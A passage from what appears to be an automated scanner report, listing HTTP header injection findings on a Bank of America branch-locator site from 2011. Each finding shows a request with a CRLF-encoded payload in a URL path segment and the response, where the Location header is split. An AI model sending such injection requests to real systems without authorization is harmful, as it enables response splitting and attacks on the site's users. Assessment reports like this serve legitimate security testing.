Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.94. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 53e4b%0d%0adfd74cff6b8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/53e4b%0d%0adfd74cff6b8/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=E7250E21F2F3EA92B566CD9EBBE9390A.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/53e4b
dfd74cff6b8/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.95. http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload fcc49%0d%0aca1853fc31 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/fcc49%0d%0aca1853fc31=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=7B758ACBB385D10E39E465CED75AB6CA.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/36__East__14th__Street_10003_NEW__YORK_NY/bank_branch_locations/fcc49
ca1853fc31=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.96. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 468e6%0d%0a57fb74cca52 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/468e6%0d%0a57fb74cca52/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:18 GMT
Server: Apache
Set-Cookie: JSESSIONID=B727F96C52189E37DFAF4FDF6F96C367.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/468e6
57fb74cca52/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.97. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 715a4%0d%0a5d4cfc7da85 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/715a4%0d%0a5d4cfc7da85/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=04ECD0B22FAF79DDF543A958EF675759.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/715a4
5d4cfc7da85/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.98. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5a3eb%0d%0a3d8f7be8d38 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/5a3eb%0d%0a3d8f7be8d38/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=84EDCFDB5D440577CD9BFAF29E983D92.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/5a3eb
3d8f7be8d38/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.99. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload eaf99%0d%0a386ae6c5 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/eaf99%0d%0a386ae6c5/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:16 GMT
Server: Apache
Set-Cookie: JSESSIONID=83A6CAF09931FA3930B3F336B4F748F2.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/eaf99
386ae6c5/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.100. http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 65303%0d%0a6c845a48691 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/65303%0d%0a6c845a48691=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=40728A233D04D6F7754960429D41AAF8.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/399__3rd__Ave_10016_NEW__YORK_NY/bank_branch_locations/65303
6c845a48691=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.101. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 67276%0d%0a56319ed0418 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/67276%0d%0a56319ed0418/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE9CB4EFD81914ED94C09364D69BB9EA.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/67276
56319ed0418/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.102. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5664c%0d%0ac153cda3bb0 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/5664c%0d%0ac153cda3bb0/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=AC36E9C569BA41AE0629A33A9CB2DCAD.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/5664c
c153cda3bb0/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.103. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ee164%0d%0a660bef1150e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/ee164%0d%0a660bef1150e/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=956AF4CC02D850CD6F633E35508E92C5.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/ee164
660bef1150e/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.104. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 6bcb8%0d%0ac477d2ff465 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/6bcb8%0d%0ac477d2ff465/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=EBA03581296B257EFDE02B8A51C3BEC3.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/6bcb8
c477d2ff465/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.105. http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 7be7f%0d%0a37b702406a4 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/7be7f%0d%0a37b702406a4=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:23 GMT
Server: Apache
Set-Cookie: JSESSIONID=1C1FB6AC0545172A758B7F638265B31A.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/39__Brick__Blvd_08723_BRICK__TOWNSHIP_NJ/bank_branch_locations/7be7f
37b702406a4=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.106. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 46bc6%0d%0ac7c63155a99 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/46bc6%0d%0ac7c63155a99/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:55 GMT
Server: Apache
Set-Cookie: JSESSIONID=B2B78051A1E019EE1D8A4AE6B0BEBE4D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/46bc6
c7c63155a99/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.107. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 82cc9%0d%0a7c8c03d00bc was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/82cc9%0d%0a7c8c03d00bc/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=F6660ACEE04E7AD52C3E8574ED80E6C9.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/82cc9
7c8c03d00bc/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.108. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ef4c7%0d%0aba588ae7a97 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/ef4c7%0d%0aba588ae7a97/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=18B7505358B7B5ABF76BB2E005273B32.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/ef4c7
ba588ae7a97/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.109. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2acc1%0d%0a9850d895dd1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/2acc1%0d%0a9850d895dd1/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=C2D589C924EC1E634FC873251C0A60DC.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/2acc1
9850d895dd1/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.110. http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 1bf76%0d%0aba7501c2b10 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/1bf76%0d%0aba7501c2b10=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=FC16E179CBEE1C19231B7BBA362E25DF.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/430__Amwell__Rd_08844_BELLE__MEAD_NJ/bank_branch_locations/1bf76
ba7501c2b10=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.111. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d4b1c%0d%0a361d12d05d0 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/d4b1c%0d%0a361d12d05d0/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:53 GMT
Server: Apache
Set-Cookie: JSESSIONID=BF54422326836CB171ABFA6207FA0105.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/d4b1c
361d12d05d0/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.112. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5ddd0%0d%0a3cf6b452ed8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/5ddd0%0d%0a3cf6b452ed8/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=2629FEC7EF66BACD718526E2F762C962.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/5ddd0
3cf6b452ed8/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.113. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 50056%0d%0adb886d12eec was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/50056%0d%0adb886d12eec/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=F1201E15640346D681DD8E397523C248.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/50056
db886d12eec/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.114. http://locators.bankofamerica.com/locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 702a4%0d%0a7c15066c6ba was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/4400__Veterans__Memorial__Hwy_11741_HOLBROOK_NY/702a4%0d%0a7c15066c6ba/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
